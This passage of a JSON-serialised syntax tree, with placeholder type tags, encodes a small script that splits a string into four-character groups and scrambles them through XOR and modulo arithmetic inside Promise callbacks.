me":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":3,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"hj","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Elements":[{"Name":"a1","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"a2","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"a3","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"a4","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"ppppp"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"cyappend","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"strList","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"hj","PAIX":-1,"TypeInfo":"
aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},{"PAIX":0,"TypeInfo":"break"}],"PAIX":0,"TypeInfo":"iiiiii"},"Alternate":null,"PAIX":0,"TypeInfo":"iiiii"},{"Token":"var","Declarations":[{"Name":"t1","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"strInfo","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"slice","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":4,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a1","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a3","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"a4","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"t1","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":3,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarati
ons":[{"Name":"hj","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Elements":[{"Name":"a1","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"a2","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"a3","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"a4","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"ppppp"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"cyappend","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"strList","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"hj","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Argument":{"Name":"strList","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"return"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"iiiiiiii"},{"Id":{"Name":"startFun","PAIX":-1,"TypeInfo":"aaaaa"},"Params":[{"Name":"cbu","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Left":{"Name":"l","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Name":"cbu","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Left":{"Name":"l","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"l","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":"cbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbbcbb","PAIX":0,"TypeInfo":"ooooo"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Token":"var","Declarations":[{"Name":"lsbl1","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Id":null,"Params":[],"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"kf","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"data","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"l","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"cbb_a","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"kf","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"ooo"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"ks","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Callee":{"Name":"Promise","PAIX":-1,"TypeInfo":"aaaaa"
},"Arguments":[{"Name":"lsbl1","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"new"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"ks2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"ks","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"then","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Id":null,"Params":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Init":{"Token":"var","Declarations":[{"Name":"i","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Init":{"Token":"var","Declarations":[{"Name":"i2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Test":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"==","PAIX":0,"TypeInfo":"yyy"},"Consequent":{"Body":[{"PAIX":0,"TypeInfo":"continue"}],"PAIX":0,"TypeInfo
":"iiiiii"},"Alternate":null,"PAIX":0,"TypeInfo":"iiiii"},{"Token":"var","Declarations":[{"Name":"allcd","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":3,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"var"},{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Name":"allcd","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"^","PAIX":0,"TypeInfo":"yyy"},"Right":{"Value":20,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Pro
perty":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Name":"allcd","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"^","PAIX":0,"TypeInfo":"yyy"},"Right":{"Value":10,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Test":{"Left":{"Name":"allcd","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":340,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003e","PAIX":0,"TypeInfo":"yyy"},"Consequent":{"Body":[{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":80,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"Alternate":null,"PAIX":0,"TypeInfo":"iiiii"},{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Name":"allcd","PAIX":-1,"TypeInfo":"aaaaa"
},"Operator":"^","PAIX":0,"TypeInfo":"yyy"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":3,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":3,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Name":"allcd","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"^","PAIX":0,"TypeInfo":"yyy"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Caller":{"Name":"cbb_b","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"ooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"dsdd","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"ks2","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"then","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Id":null,"Params":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Caller":{"Name":"cyout","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Propert
y":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"ooo"},{"Id":null,"Params":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"alldata","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Elements":[],"PAIX":0,"TypeInfo":"ppppp"},"PAIX":0,"TypeInfo":"var"},{"Init":{"Token":"var","Declarations":[{"Name":"i","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Init":{"Token":"var","Declarations":[{"Name":"i2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":4,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"dpppp","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"
Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":5,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"jii","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":100,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},{"Block":{"Body":[{"Left":{"Name":"jii","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Name":"dpppp","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"\u003e\u003e","PAIX":0,"TypeInfo":"yyy"},"Right":{"Value":3,"PAIX":0,"TypeInfo":"ttt"},"Operator":"*","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"Handler":{"Param":null,"Body":{"Body":[{"Left":{"Name":"jii","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":400,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"catch"},"PAIX":0,"TypeInfo":"try"},{"Caller":{"Name":"cyappend","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},{"Left":{"Name":"jii","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":3000,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"}],"PAIX":0,"TypeInfo":"iiii"},{"Test":{"Left":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaa
a"},"Arguments":[{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"-","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":1000,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003e","PAIX":0,"TypeInfo":"yyy"},"Consequent":{"Body":[{"Left":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"-","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"-","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"Alternate":null,"PAIX":0,"TypeInfo":"iiiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Left":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":255,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Id":{"Name":"gid","PAIX":-1,"TypeInfo":"aaaaa"},"Params":[{"Name":"irr","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Id":{"Name":"djki","PAIX":-1,"TypeInfo":"aaaaa"},"Params":[],"Body":{"Body":[{"Test":{"Left":{"Name"
:"irr","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Operator":"!=","PAIX":0,"TypeInfo":"yyy"},"Consequent":{"Body":[{"Argument":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"return"}],"PAIX":0,"TypeInfo":"iiiiii"},"Alternate":null,"PAIX":0,"TypeInfo":"iiiii"},{"Token":"var","Declarations":[{"Name":"dshu","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Elements":[],"PAIX":0,"TypeInfo":"ppppp"},"PAIX":0,"TypeInfo":"var"},{"Init":{"Token":"var","Declarations":[{"Name":"i","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Left":{"Object":{"Name":"dshu","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Init":{"Token":"var","Declarations":[{"Name":"ivvv","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Le
